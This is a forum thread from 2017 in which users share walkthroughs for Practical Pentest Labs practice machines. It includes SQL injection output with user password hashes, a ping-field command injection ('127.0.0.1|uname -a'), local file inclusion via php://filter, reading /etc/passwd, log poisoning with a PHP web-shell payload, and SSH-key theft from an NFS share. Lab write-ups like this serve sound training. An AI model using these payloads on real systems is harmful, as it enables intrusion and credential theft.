h4x0r (h4x0r) 2017-06-10 19:30:57 UTC #3

Much appreciated Mr Rick !

cecu (CeCu) 2017-06-10 20:53:54 UTC #4

I never heard it. Thanks a lot

h4x0r (h4x0r) 2017-06-10 22:43:15 UTC #5

No problem @cecu, if you successfully PWN "HIGINI" give us some hints ... it's a pain !

exploit (exploit) 2017-06-11 00:54:23 UTC #6

Thanks for the share! I just saw that 'HAGINI' and got command execution on it already, but i don't know what to do with it, nothing to read

h4x0r (h4x0r) 2017-06-11 13:16:45 UTC #7

Awesome, @exploit .. yeah there isn't a flag submission system there, they are working on it as per their latest tweet

We know the current UI and website interface are crappy, we are working on something new. In the meantime you can still join and practice
— PracticalPentestLabs ( @ppentestlabs ) June 10, 2017

Can you write a small walk-through on how you did "HIGINI" ?

DamaneDz (DamaneDz) 2017-06-11 16:44:28 UTC #9

HOSTNAME:C3PO
IP:10.0.1.6

I Found a SQLi in the Search Box

http://10.0.1.6/inc/search.php?query=xxx

By adding the single quotes you'll get the Error message

I used SQLMap For Quick and Fast injection

as you see 3 types of injection ...

Anyway

    select table_name FROM information_schema.tables where table_schema='vuln' [13]:
[*] adrbook
[*] eshop_goods
[*] eshop_orders
[*] flashgames
[*] log
[*] messages
[*] provozovny
[*] review_answers
[*] review_category
[*] review_questions
[*] statistics
[*] tickets
[*] users

select column_name from information_schema.columns where table_name='users' [10]:
[*] alterpass
[*] heslo
[*] id
[*] image
[*] isadmin
[*] login
[*] nick
[*] remail
[*] secondmail
[*] telefon

SELECT id,login,heslo,isadmin FROM users [13]:

[*] 1, karel, f196c5c9a5f002d14cfc2aafce74e39b, 0
[*] 2, jana, 3f858cf8cfd59f25010e71b6b5671428, 0
[*] 12, michal, 955db0b81ef1989b4a4dfeae8061a9a6, 0
[*] 13, Smolicek, 593a90797681ebd0b8c44315a4caf6ff, 0
[*] 14, jezinky, 4475987873e549d5208f8ad743fc3d07, 0
[*] 15, utocnik, 955db0b81ef1989b4a4dfeae8061a9a6, 0
[*] 18, uzivatel, 32250170a0dca92d53ec9624f336ca24, 0
[*] 21, admin, 32250170a0dca92d53ec9624f336ca24, 1
[*] 23, prochy, 32f055ca38a83ecb670b04edb50016ad, 0
[*] 24, prochy2, 2d8883c2d85b14fdcb44e3b3dc959535, 0
[*] 25, butterfly2, 1adbb3178591fd5bb0c248518f39bf6d, 0
[*] 26, test, 098f6bcd4621d373cade4e832627b4f6, 0
[*] 27, qyqouxmg, ae219661afe50f60419afbe08c45947d, 0

The Only user Have admin privileges is admin himself

[*] 21, admin, 32250170a0dca92d53ec9624f336ca24, 1

go to this option

and as we know The ping option use "system" function or "exec" or ... so its clear that this box is vulnerable

Lemme check if its work first let ping the local ip address 127.0.0.1

Okay Cool

To Run many functions you have to use | as separator between them

The PHP code Must be like that

<?php
echo system("ping {$_GET['host']}");
?>

So Let's Try to send this Request

127.0.0.1|uname -a

Works Fine

Whatever ....

I Tried to upload a PHP Shell using "wget" but nothing ....
I Read some PHP Files using "cat" command

That lead me to the config file named "base.php"

// .... PHP code
    $mysqlServer = 'localhost';
    $mysqlUser = 'vuln';
    $mysqlPassword = 'vuln';
    $mysqlName = 'vuln';
// .... PHP code

... To Be Continued

h4x0r (h4x0r) 2017-06-12 18:01:03 UTC #10

Awesome, thank you guys. Looking forward for more

DamaneDz (DamaneDz) 2017-06-12 18:11:49 UTC #11

HOSTNAME:TADDEO
IP:10.0.3.10

Let's add "name" as a parameter to our request

Nothing shown ! let's add phpinfo.php

Looks Like (LFI) Local File Include ...

Let's Read config.php file via PHP Filter

php://filter/convert.base64-encode/resource=config.php

We'll get base64 code

<?php
define( 'DB_NAME', 'test' );

/** MySQL database username */
define( 'DB_USER', 'taddeo' );

/** MySQL database password */
define( 'DB_PASSWORD', [email protected]' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

?>

This is The Code After Decoding ...

Now Let's Read /etc/passwd FILE

view-source:http://10.0.3.10/file.php?name=/etc/passwd

I'm Trying To upload a PHP Shell

So i'll update this post if there is anything important or i'll try to solve another challenge !

andmuchmore (andmuchmore) 2017-06-13 04:10:36 UTC #12

HOSTNAME:TADDEO
IP:10.0.3.10

Did the same as DamaneDz
Then I used the MySQL user to log in to ssh
Then managed to escalate my privs to root

I did a quick search for the flag but didnt have any luck.

Any ideas?

andmuchmore (andmuchmore) 2017-06-13 04:20:42 UTC #13

HOSTNAME: RASIM
IP: 10.0.3.11

Quick nmap scan

Nmap scan report for 10.0.3.11

PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
2049/tcp open nfs

I tried to mount the nfs locally

mount 10.0.3.11:/ /test/

After a bit of digging around I found that /home/rasim/ had ssh keys in there.

Haven't attemped to replace them yet but I am guess that should give us ssh access to the box.

Mosa_Tladi (Mosa Tladi) 2017-06-13 09:56:18 UTC #14

10.0.1.6

Hi,

Should I not be able to ping my attack pc?

I am trying to get a shell but seeing that I am unable to even ping my PC the shell wont connect back or is this part of the challenge?

Thanks

h4x0r (h4x0r) 2017-06-13 10:58:47 UTC #15

Good job on TADDEO and RASIM I was able to get a shell the same way, although I did find the FLAG in the root/ directory of the host, I think you should check back when the hosts are reverted

10.0.1.6

Hi,

Should I not be able to ping my attack pc?

I am trying to get a shell but seeing that I am unable to even ping
my PC the shell wont connect back or is this part of the challenge?

Thanks

I think it's part of the challenge, I was able to bypass that though

DamaneDz (DamaneDz) 2017-06-13 16:35:38 UTC #16

There is no hints in the challenges so I thought I have only to exploit them
anyway I solved the first part and you can solve the second

andmuchmore (andmuchmore) 2017-06-14 03:08:09 UTC #17

Any hints on how you got root on C3PO?

I have have shell and I thought the overlayfs exploit might I couldn't seem to get it to work. I also tried a few others and they just seemed to crash the server

_py 2017-06-14 04:29:46 UTC #18

@pry0cc @oaktree: I believe this post needs to resume on IRC at this point.

h4x0r (h4x0r) 2017-06-14 18:49:26 UTC #19

Why @_py ? is there a limit on how much replies per post ?

_py 2017-06-14 19:23:11 UTC #20

@h4x0r: Imagine me and 2-3 other folks tackling picoCTF, which lasts for 2 weeks, on the forum. It'd be much more convenient if you just hang out on IRC and at the same you won't be shading other posts.

pry0cc (Full-time Badass) 2017-06-14 20:59:16 UTC #21

I agree with @_py. The IRC is the ultimate place for figuring stuff out and solving problems. The forum is a place for discussion, perhaps writeups, how you did it, or one or two issues you may be facing. But a conversation about breaking it, that is a job for the IRC.

If you have ever used Facebook, would you have a conversation in the comment section? That is what this may be like.

iamforgettable (Iamforgettable) 2017-06-16 11:48:32 UTC #22

Just knocked over HIGINI if anyone is interested.
This is basically the approach I took step by step:

1. nmap -> find ports 22+80
2. View source -> find creds 'test' and 'test'. Enter creds but they don't go far. Some page called 'expenses.php' which doesn't exist (useful later :-) )

3. Hit up '/robots.txt'. Find /dev.
4. Download pages -> note obvious LFI from the 'users' cookie. Guess that the same pages in /dev are available in /. Test with ../../../../etc/passwd as the user cookie and the LFI works

5. Using the path /proc/self/fd/2 shows the error log. Note the instance of the 'referer' header being written out - particularly when the expenses.php file can't be found

6. Login in again but this time polluting the referer header with the <?php echo('thisworks!'); system($_GET['cmd']); ?> string set.
7. Reroll the 5th step - note the 'thisworks!' string being printed.
8. Passing in cmd=ls as the query yields RCE.

DB credentials can be found at this point.
Don't see obvious privesc yet.

_py 2017-06-16 12:01:05 UTC #23

I'm glad you gave 0 fucks about the 2 comments above.